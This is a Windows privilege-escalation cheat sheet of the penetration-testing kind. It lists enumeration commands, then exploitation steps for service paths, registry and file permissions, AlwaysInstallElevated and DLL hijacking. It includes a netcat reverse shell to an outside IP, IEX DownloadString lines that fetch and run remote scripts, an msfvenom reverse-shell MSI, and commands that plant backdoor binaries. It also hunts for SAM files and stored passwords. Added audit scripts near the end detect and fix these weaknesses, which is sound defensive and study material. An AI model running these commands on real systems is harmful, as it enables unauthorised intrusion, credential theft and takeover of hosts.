# Windows Privilege Escalation

#### Check OS, patch level, basics

{% code overflow="wrap" %}

```powershell
systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"System Type"   # add further /C:"..." filters for other fields
## Updates
wmic qfe get Caption,Description,HotFixID,InstalledOn
wmic logicaldisk get caption,description

## Applications
wmic product get name, version, vendor
accesschk.exe -uws "Everyone" "C:\Program Files"
Get-ChildItem "C:\Program Files" -Recurse | Get-ACL | ?{$_.AccessToString -match "Everyone\sAllow\s\sModify"}

## Services
sc query state= all | findstr "SERVICE_NAME:"
wmic service get name,displayname,pathname,startmode
Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'}


## Volume
mountvol

## Drivers - in powershell
driverquery.exe /v /fo csv | ConvertFrom-CSV | Select-Object 'Display Name', 'Start Mode', Path
Get-WmiObject Win32_PnPSignedDriver | Select-Object DeviceName, DriverVersion, Manufacturer | Where-Object {$_.DeviceName -like "*VMware*"}

whoami  
echo %USERNAME%  

whoami /priv
whoami /groups 
whoami /all
# If user has SeImpersonate privs 
# \\192.168.119.155\test\juicy.exe -l 4444 -p c:\windows\system32\cmd.exe -a "/c  \\192.168.119.155\test\nc.exe -e cmd.exe 192.168.119.155 4447" -t * -c {6d18ad12-bde3-4393-b311-099c346e6df9} 

net user  
net localgroup  
net user /domain  
net group /domain  
net group /domain <Group Name>  
```

{% endcode %}

### Firewall / AV / Defender

```powershell
netsh firewall show state       # legacy "netsh firewall" context; Windows 7 and later report it as deprecated
netsh firewall show config
sc query windefend
netsh advfirewall firewall dump
```

### Network

```powershell
ipconfig /all  
route print  
arp -a
```

### Checklist automated tools

{% code overflow="wrap" %}

```powershell
Run winpeas 
Run PowerUp.ps1
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://192.168.119.155/PowerUp.ps1');Invoke-AllChecks"

Run Sherlock.ps1
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://192.168.119.155/Sherlock.ps1');Find-AllVulns"

accesschk.exe /accepteula -wvu
Folder Perms 
\\192.168.119.155\test\accesschk.exe /accepteula -uwdqs "Authenticated Users" C:\
\\192.168.119.155\test\accesschk.exe /accepteula -uwdqs "Everyone" C:\
File Perms 
\\192.168.119.155\test\accesschk.exe /accepteula -uwqs  "Authenticated Users" C:\*.*
\\192.168.119.155\test\accesschk.exe /accepteula -uwdqs "Everyone" C:\*.*

Run JAWS

# Executables  
WinPEAS.exe /.bat * 
Seatbelt.exe 
Watson.exe * 
Sharpup.exe 
windows-privesc-check2.exe --dump -G

#Powershell 
Sherlock.ps1 * 
PowerUp.ps1 * 
jaws-enum.ps1 *


#Other 
Windows-exploit-suggester.py *
# Save the systeminfo output to a text file and feed it to windows-exploit-suggester.py; search for the suggested exploits in the SecWiki GitHub repo

MSF exploit suggester *
# In a meterpreter session: run post/multi/recon/local_exploit_suggester -> shows list of kernel

```

{% endcode %}

### Scheduled Tasks

```powershell
schtasks /query /fo LIST /v > schtasks.txt   # copy schtasks.txt to the attacking machine and filter it there:
cat schtasks.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM

dir %SystemRoot%\Tasks  

e.g. c:\windows\tasks\  
e.g. c:\windows\system32\tasks\  

# If we have write permissions on the scheduled task's binary or its directory
accesschk.exe -dqv "E:\GrabLogs"
copy evil-tftp.exe E:\GrabLogs\tftp.exe

```

### Startups and autoruns

```powershell
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run

wmic startup get caption,command
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\R
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
dir "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
dir "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"

# Check access on the files and directories with accesschk; if they are writable, we can drop a malicious binary in place
accesschk64.exe /accepteula -wvu "C:\Program Files\Autorun Program"
```

### Service Permissions

#### Check if service config can be modified

```powershell
accesschk.exe /accepteula  
accesschk.exe -uwcqv "Authenticated Users" * /accepteula  
accesschk.exe -ucqv <Service Name>

sc qc <Service Name>  # Get service details
```

#### Check service with weak file permission

{% code overflow="wrap" %}

```powershell
# Using wmic.exe
for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> c:\windows\temp\permissions.txt

for /f eol^=^"^ delims^=^" %a in (c:\windows\temp\permissions.txt) do cmd.exe /c icacls "%a"  

# Using sc.exe
sc query state= all | findstr "SERVICE_NAME:" >> Servicenames.txt  

FOR /F %i in (Servicenames.txt) DO echo %i  

type Servicenames.txt  
FOR /F "tokens=2 delims= " %i in (Servicenames.txt) DO @echo %i >> services.txt  

FOR /F %i in (services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> path.txt  
```

{% endcode %}

### Unquoted Service Path

{% code overflow="wrap" %}

```powershell
wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """  

sc query  
sc qc <service name>
```

{% endcode %}

#### AlwaysInstallElevated (from a 32-bit shell on 64-bit Windows use %SystemRoot%\Sysnative\reg.exe)

```bash
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\

# Check for AlwaysInstallElevated = 1; if yes, create an msfvenom MSI payload
msfvenom -p windows/shell_reverse_tcp lhost= lport= -f msi -o setup.msi
msiexec /quiet /qn /i C:\Temp\setup.msi
```

### Password in files

#### Can we find any SAM files?

```powershell
%SYSTEMROOT%\repair\SAM  
%SYSTEMROOT%\System32\config\RegBack\SAM  
%SYSTEMROOT%\System32\config\SAM  
%SYSTEMROOT%\repair\system  
%SYSTEMROOT%\System32\config\SYSTEM  
%SYSTEMROOT%\System32\config\RegBack\system  

findstr /si password *.txt  
findstr /si password *.xml  
findstr /si password *.ini  
Findstr /si password *.config 
findstr /si pass/pwd *.ini  

dir /s *pass* == *cred* == *vnc* == *.config*  

# in all files
findstr /spin "password" *.*
```

### Registry

```powershell
### VNC
reg query "HKCU\Software\ORL\WinVNC3\Password"  
reg query "HKCU\Software\TightVNC\Server"  

### Windows autologin  
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"  
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"  

### SNMP parameters
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP"

### Putty  
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"  

### Search for password in registry  
reg query HKLM /f password /t REG_SZ /s  
reg query HKCU /f password /t REG_SZ /s  

```
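The AlwaysInstallElevated and Windows autologon checks above both reduce to reading a few registry values and interpreting them correctly. The following added script (not part of the original cheat sheet) does that interpretation: AlwaysInstallElevated is only honoured by Windows Installer when both the HKLM and the HKCU value are 1, and the autologon check reports whether a cleartext `DefaultPassword` is present without printing it. It assumes the PowerShell registry provider and a 64-bit PowerShell session so the native registry view is read.

```powershell
# Added check, not part of the original cheat sheet. Reports whether AlwaysInstallElevated is
# effective (Windows Installer honours it only when BOTH the HKLM and the HKCU value are 1) and
# whether Winlogon holds a cleartext autologon password. Uses the PowerShell registry provider;
# run it from 64-bit PowerShell so the native registry view is read.

function Get-RegValue([string]$Key, [string]$Name) {
    # Returns $null when the key or the value does not exist instead of throwing.
    $item = Get-ItemProperty -Path $Key -Name $Name -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $null }
    return $item.$Name
}

function Test-AlwaysInstallElevated {
    $hklm = Get-RegValue 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer' 'AlwaysInstallElevated'
    $hkcu = Get-RegValue 'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer' 'AlwaysInstallElevated'
    [pscustomobject]@{
        Check   = 'AlwaysInstallElevated'
        HKLM    = $hklm
        HKCU    = $hkcu
        Exposed = ($hklm -eq 1 -and $hkcu -eq 1)   # a single value set to 1 is not enough
        Fix     = 'Group Policy > Administrative Templates > Windows Components > Windows Installer > ' +
                  'Always install with elevated privileges = Disabled (Computer and User Configuration)'
    }
}

function Test-AutoLogonCredentials {
    $key = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
    $password = Get-RegValue $key 'DefaultPassword'
    [pscustomobject]@{
        Check   = 'Winlogon autologon'
        Enabled = ((Get-RegValue $key 'AutoAdminLogon') -eq '1')
        User    = "$(Get-RegValue $key 'DefaultDomainName')\$(Get-RegValue $key 'DefaultUserName')"
        Exposed = (-not [string]::IsNullOrEmpty($password))   # report presence only; never print the secret
        Fix     = 'Delete DefaultPassword; if autologon is required, configure it with Sysinternals Autologon, ' +
                  'which stores the password as an LSA secret instead of a readable registry string'
    }
}

@(Test-AlwaysInstallElevated; Test-AutoLogonCredentials) | Format-List
```

`Exposed = $true` on the first object is the condition under which the MSI technique above works; a value of 1 in only one of the two keys is a finding to clean up but is not exploitable on its own.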

### **Unquoted Service Path Exploitation**

{% code fullWidth="true" %}

```powershell

## Case 1: SeShutdownPrivilege is listed in whoami /priv (it does not matter if it shows as Disabled)

# Search for services that auto start:
wmic service get name,displayname,pathname,startmode | findstr /i "auto"
# Search for non-standard services
wmic service get name,displayname,pathname,startmode |findstr /i "auto" | findstr /i /v "c:\windows"
# Potential unquoted service output example
Heisenburg Service   heisenburgsvc     C:\Program Files\Heisenburg\The One Who\knocks.exe        auto

# next check if W or F permission exists for BUILTIN\Users or Everyone on one of the parent directories
icacls "C:\\"                         # or: .\accesschk.exe /accepteula -uwdq C:\
icacls "C:\Program Files"             # or: .\accesschk.exe /accepteula -uwdq "C:\Program Files"
icacls "C:\Program Files\Heisenburg"  # or  .\accesschk.exe /accepteula -uwdq "C:\Program Files\Heisenburg"

# Example output if BUILTIN\Users or Everyone has (F), (M) or (W) on "C:\Program Files\Heisenburg"; (I) only marks an inherited ACE and (RX) is read/execute, which is not enough:
#                  BUILTIN\Users:(F)
#                  BUILTIN\Users:(I)(RX)
# Example output for accesschk.exe:
#  RW BUILTIN\Users

# Create reverse shell binary and copy it accordingly
copy %temp%\backdoor.exe "C:\Program Files\Heisenburg\The.exe" 

# now reboot to have the service auto start 
shutdown /r /t 0

## Case 2, SeShutdownPrivilege = Disabled, we have (service_stop,service_start) privilege on a service

# Search for services that has manual start mode and non-standard
wmic service get name,displayname,pathname,startmode | findstr /i "manual" | findstr /i /v "c:\windows"
# Potential unquoted service output example
Heisenburg Service   heisenburgsvc     C:\Program Files\Heisenburg\The One Who\knocks.exe        manual

# Check if we have service_stop, service_start privilege
.\accesschk.exe /accepteula -ucqv user heisenburgsvc

# next check if W or F permission exists for BUILTIN\Users or Everyone on one of the parent directories
icacls "C:\\"                         # or: .\accesschk.exe /accepteula -uwdq C:\
icacls "C:\Program Files"             # or: .\accesschk.exe /accepteula -uwdq "C:\Program Files"
icacls "C:\Program Files\Heisenburg"  # or  .\accesschk.exe /accepteula -uwdq "C:\Program Files\Heisenburg"

# Example output if BUILTIN\Users or Everyone has (F), (M) or (W) on "C:\Program Files\Heisenburg"; (I) only marks an inherited ACE and (RX) is read/execute, which is not enough:
#                  BUILTIN\Users:(F)
#                  BUILTIN\Users:(I)(RX)
# Example output for accesschk.exe:
#  RW BUILTIN\Users



# Since there are spaces in the unquoted path "C:\Program Files\Heisenburg\The One Who\knocks.exe",
# Windows tries "C:\Program.exe", then "C:\Program Files\Heisenburg\The.exe", then "C:\Program Files\Heisenburg\The One.exe", and only then the real "C:\Program Files\Heisenburg\The One Who\knocks.exe"

# Create reverse shell binary and copy it accordingly

copy %temp%\backdoor.exe "C:\Program Files\Heisenburg\The.exe" 

# Start netcat listener to catch the reverse shell and start the service
net start heisenburgsvc # net stop heisenburgsvc first if the service is already running.

```

{% endcode %}

**Weak Registry Permissions Exploitation**

{% code overflow="wrap" %}

```powershell
# Check permissions for an example service "upnphost"
Get-Acl HKLM:\System\CurrentControlSet\Services\upnphost | Format-List # PowerShell
# Example output, Check if NT AUTHORITY\INTERACTIVE has Full Control
# Access : Everyone Allow  ReadKey
#          NT AUTHORITY\INTERACTIVE Allow  FullControl
#          NT AUTHORITY\SYSTEM Allow  FullControl 
.\accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\upnphost # same thing accesschk
# Example output for accesschk.exe:
#   RW NT AUTHORITY\INTERACTIVE
#         KEY_ALL_ACCESS

# Check if we have service_stop, service_start privilege
.\accesschk.exe /accepteula -ucqv user upnphost

# If both conditions are met we can start exploiting this now.

# list current values of the service
reg query HKLM\System\CurrentControlSet\Services\upnphost
# example output:
# HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\upnphost
#     DisplayName    REG_SZ    @%systemroot%\system32\upnphost.dll,-213
#     ErrorControl    REG_DWORD    0x1
#     ImagePath    REG_EXPAND_SZ    %SystemRoot%\system32\svchost.exe -k LocalServiceAndNoImpersonation
#     ...

# update ImagePath to point to our reverse shell payload
reg add HKLM\System\CurrentControlSet\Services\upnphost /v ImagePath /t REG_EXPAND_SZ /d C:\Windows\Temp\backdoor.exe /f
# Start netcat listener to catch the reverse shell and start the service
net start "upnphost" # net stop "upnphost" first if the service is already running.
```

{% endcode %}
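The walkthrough above checks one service key by hand. The following added script (not part of the original cheat sheet) applies the same test to every key under `HKLM\SYSTEM\CurrentControlSet\Services`: it reports keys where Everyone, BUILTIN\Users, Authenticated Users or INTERACTIVE (matched by SID, so the check works on any OS language) hold a right that allows rewriting `ImagePath` or widening the ACL. It assumes it is run on the host being reviewed.

```powershell
# Added audit script, not part of the original cheat sheet. It walks every key under
# HKLM\SYSTEM\CurrentControlSet\Services and reports the ones where a low-privilege principal
# (Everyone, BUILTIN\Users, Authenticated Users or INTERACTIVE, matched by SID) can set values
# such as ImagePath or change the key's permissions, which is the condition the upnphost
# walkthrough above relies on. Assumes it runs on the host being reviewed.

$LowPrivSids = @('S-1-1-0', 'S-1-5-32-545', 'S-1-5-11', 'S-1-5-4')

function Get-Sid([System.Security.Principal.IdentityReference]$Identity) {
    try { return $Identity.Translate([System.Security.Principal.SecurityIdentifier]).Value } catch { return $null }
}

function Get-WeakServiceKeys {
    # Rights that allow rewriting ImagePath or widening the ACL further.
    $rights = [System.Security.AccessControl.RegistryRights]'SetValue, CreateSubKey, ChangePermissions, TakeOwnership'
    $inheritOnly = [System.Security.AccessControl.PropagationFlags]::InheritOnly
    foreach ($key in (Get-ChildItem -Path 'HKLM:\SYSTEM\CurrentControlSet\Services' -ErrorAction SilentlyContinue)) {
        $acl = Get-Acl -LiteralPath $key.PSPath -ErrorAction SilentlyContinue
        if (-not $acl) { continue }
        $grants = @()
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if (($ace.PropagationFlags -band $inheritOnly) -ne 0) { continue }   # applies to subkeys only
            if ($LowPrivSids -notcontains (Get-Sid $ace.IdentityReference)) { continue }
            if (($ace.RegistryRights -band $rights) -ne 0) { $grants += "$($ace.IdentityReference) = $($ace.RegistryRights)" }
        }
        if ($grants.Count -eq 0) { continue }
        [pscustomobject]@{
            Service   = $key.PSChildName
            ImagePath = (Get-ItemProperty -Path $key.PSPath -Name ImagePath -ErrorAction SilentlyContinue).ImagePath
            WeakACEs  = ($grants -join '; ')
        }
    }
}

# Each hit should have its DACL reset to the default (Full Control for SYSTEM and Administrators,
# Read for Users) with Set-Acl, then be re-checked with accesschk -k as shown above.
Get-WeakServiceKeys | Format-Table -AutoSize -Wrap
```

Deny ACEs are not evaluated, so a reported key is a lead to confirm with `accesschk -k` rather than a proven finding; an empty result means no service key grants those rights to the listed principals.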

**Weak Service Executable File Permissions Exploitation**

{% code overflow="wrap" %}

```powershell
# verify that we can overwrite an existing service binary file
icacls "C:\Program Files\Heisenburg\knocks.exe"  # or .\accesschk.exe /accepteula -uvwq "C:\Program Files\Heisenburg\knocks.exe"

# Example output if BUILTIN\Users or Everyone has (F), (M) or (W) on "C:\Program Files\Heisenburg\knocks.exe"; (I) only marks an inherited ACE and (RX) is read/execute, which is not enough:
#                  Everyone:(F)
#                  BUILTIN\Users:(I)(RX)
# Example output for accesschk.exe:
#  RW BUILTIN\Users
#        FILE_ALL_ACCESS

# backup original executable
copy "C:\Program Files\Heisenburg\knocks.exe"  C:\Temp\

# Create reverse shell binary and overwrite the existing one
copy /Y C:\Temp\backdoor.exe "C:\Program Files\Heisenburg\knocks.exe" 
# Start netcat listener to catch the reverse shell and start the service
net start "heisenburgsvc" # net stop "heisenburgsvc" first if the service is already running.
```

{% endcode %}

### **DLL hijacking**

You can see the DLL search order on 32-bit systems below:

1. The directory from which the application loaded
2. 32-bit System directory (C:\Windows\System32)
3. 16-bit System directory (C:\Windows\System)
4. Windows directory (C:\Windows)
5. The current working directory (CWD)
6. Directories in the PATH environment variable (system then user)

As a low privilege user we have little hope of putting a malicious DLL in 1-4; 5 is not a possibility in this case because we are talking about a Windows service, but if we have write access to any of the directories in the Windows PATH we win.

```powershell
echo %path%
# We can check our access permissions with accesschk or cacls
accesschk.exe -dqv "C:\Python27"
cacls "C:\Python27"
# Before we go over to action we need to check the status of the IKEEXT service. In this case we can see it is set to "AUTO_START" so it will launch on boot!
sc qc IKEEXT
copy evil.dll C:\Python27\wlbsctrl.dll
# Restart (reboot) so IKEEXT starts and loads the DLL
```
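The Scheduled Tasks, Startups and autoruns, Service Permissions, Unquoted Service Path and DLL hijacking sections above all ask the same question of different locations: can a low-privilege principal write to a file or directory that SYSTEM will later execute or search? The following added audit script (not part of the original cheat sheet) runs that question in one pass over service command lines, SYSTEM or elevated scheduled task actions, HKLM Run/RunOnce entries and the machine-wide PATH. It derives the unquoted-path candidates the way CreateProcess does (every prefix ending before a space, with `.exe` appended), skips inherit-only ACEs such as the Authenticated Users `(IO)(M)` entry on `C:\`, and matches principals by SID so it works on any OS language. It assumes Windows 8 / Server 2012 or later for `Get-ScheduledTask` and rights to read the ACLs involved.

```powershell
# Added audit script, not part of the original cheat sheet. It runs the checks the Scheduled Tasks,
# Startups and autoruns, Service Permissions, Unquoted Service Path and DLL hijacking sections do by
# hand in one pass: for every service command line, SYSTEM/elevated scheduled task action and HKLM
# Run/RunOnce entry it reports whether a low-privilege principal can replace the binary, plant a file
# at an unquoted-path prefix or write to the binary's directory, and it lists writable machine PATH
# directories. Assumes Windows 8 / Server 2012 or later (Get-ScheduledTask) and rights to read ACLs.

# SIDs every interactive low-privilege user carries: Everyone, BUILTIN\Users, Authenticated Users,
# INTERACTIVE. Matching SIDs rather than names keeps the check independent of the OS language.
$LowPrivSids = @('S-1-1-0', 'S-1-5-32-545', 'S-1-5-11', 'S-1-5-4')

function Get-Sid([System.Security.Principal.IdentityReference]$Identity) {
    try { return $Identity.Translate([System.Security.Principal.SecurityIdentifier]).Value } catch { return $null }
}

function Test-LowPrivWritable([string]$Path) {
    # True when an effective Allow ACE for a low-privilege SID grants WriteData (create files, for a
    # directory), ChangePermissions or TakeOwnership. Inherit-only ACEs (such as the Authenticated
    # Users (IO)(M) entry on C:\) do not apply to the object itself and are skipped. Deny ACEs and
    # unmapped generic rights are not evaluated, so confirm each hit with icacls or accesschk.
    if ([string]::IsNullOrEmpty($Path) -or -not (Test-Path -LiteralPath $Path)) { return $false }
    $acl = Get-Acl -LiteralPath $Path -ErrorAction SilentlyContinue
    if (-not $acl) { return $false }
    $rights = [System.Security.AccessControl.FileSystemRights]'WriteData, ChangePermissions, TakeOwnership'
    $inheritOnly = [System.Security.AccessControl.PropagationFlags]::InheritOnly
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if (($ace.PropagationFlags -band $inheritOnly) -ne 0) { continue }
        if ($LowPrivSids -notcontains (Get-Sid $ace.IdentityReference)) { continue }
        if (($ace.FileSystemRights -band $rights) -ne 0) { return $true }
    }
    return $false
}

function Get-CommandExecutable([string]$CommandLine) {
    # A quoted path is taken verbatim; an unquoted one is cut at the first .exe/.bat/... token.
    $cmd = [Environment]::ExpandEnvironmentVariables($CommandLine.Trim())
    if ($cmd -match '^"([^"]+)') { return $Matches[1] }
    if ($cmd -match '^(.+?\.(exe|bat|cmd|ps1|vbs|js))(\s|$)') { return $Matches[1] }
    return ($cmd -split '\s+')[0]
}

function Get-UnquotedPathCandidates([string]$CommandLine) {
    # Files CreateProcess tries before the real binary when the path is unquoted and contains
    # spaces: each prefix ending just before a space, with .exe appended. For
    # C:\Program Files\Heisenburg\The One Who\knocks.exe that is C:\Program.exe,
    # C:\Program Files\Heisenburg\The.exe and C:\Program Files\Heisenburg\The One.exe.
    $cmd = [Environment]::ExpandEnvironmentVariables($CommandLine.Trim())
    if ($cmd.StartsWith('"')) { return @() }
    $exe = Get-CommandExecutable $cmd
    $out = @()
    $i = $exe.IndexOf(' ')
    while ($i -ge 0) { $out += ($exe.Substring(0, $i) + '.exe'); $i = $exe.IndexOf(' ', $i + 1) }
    return $out
}

function Test-AutostartCommand([string]$Source, [string]$Name, [string]$CommandLine) {
    $exe = Get-CommandExecutable $CommandLine
    if (-not [System.IO.Path]::IsPathRooted($exe)) { return }   # bare names resolve via PATH, checked below
    $issues = @()
    foreach ($c in (Get-UnquotedPathCandidates $CommandLine)) {
        if (Test-LowPrivWritable (Split-Path -Parent $c)) { $issues += "unquoted path, can plant $c" }
    }
    if (Test-LowPrivWritable $exe) { $issues += "binary writable" }
    if (Test-LowPrivWritable (Split-Path -Parent $exe)) { $issues += "binary directory writable (DLL search order step 1)" }
    if ($issues.Count -gt 0) {
        [pscustomobject]@{ Source = $Source; Name = $Name; Command = $CommandLine; Issues = ($issues -join '; ') }
    }
}

function Get-WritableAutostarts {
    foreach ($svc in (Get-CimInstance -ClassName Win32_Service)) {
        if ($svc.PathName) { Test-AutostartCommand "Service ($($svc.StartMode), $($svc.StartName))" $svc.Name $svc.PathName }
    }
    foreach ($task in (Get-ScheduledTask -ErrorAction SilentlyContinue)) {
        $p = $task.Principal
        if ($task.State -eq 'Disabled' -or -not ($p.UserId -match 'SYSTEM|S-1-5-18' -or $p.RunLevel -eq 'Highest')) { continue }
        foreach ($a in $task.Actions) {   # COM-handler actions have no Execute member and are skipped
            if ($a.Execute) { Test-AutostartCommand "Task ($($p.UserId))" "$($task.TaskPath)$($task.TaskName)" $a.Execute }
        }
    }
    foreach ($key in 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run', 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce') {
        $values = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
        if (-not $values) { continue }
        foreach ($v in @($values.PSObject.Properties | Where-Object { $_.Name -notlike 'PS*' })) {
            Test-AutostartCommand 'Run key' "$key\$($v.Name)" ([string]$v.Value)
        }
    }
    # Services resolve DLLs through the machine-wide PATH (step 6 of the search order).
    foreach ($d in ([Environment]::GetEnvironmentVariable('Path', 'Machine') -split ';' | Where-Object { $_ })) {
        $dir = [Environment]::ExpandEnvironmentVariables($d.Trim())
        if (Test-LowPrivWritable $dir) {
            [pscustomobject]@{ Source = 'Machine PATH'; Name = $dir; Command = ''; Issues = 'directory writable (DLL search order step 6)' }
        }
    }
}

Get-WritableAutostarts | Format-List
```

Each reported service with an "unquoted path" issue is fixed by quoting its binary path (`sc.exe config <name> binPath= "\"C:\full\path.exe\" args"`); "binary writable", "binary directory writable" and PATH findings are ACL problems and need the offending ACE removed with `icacls` and the result re-checked with the `accesschk` commands above.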

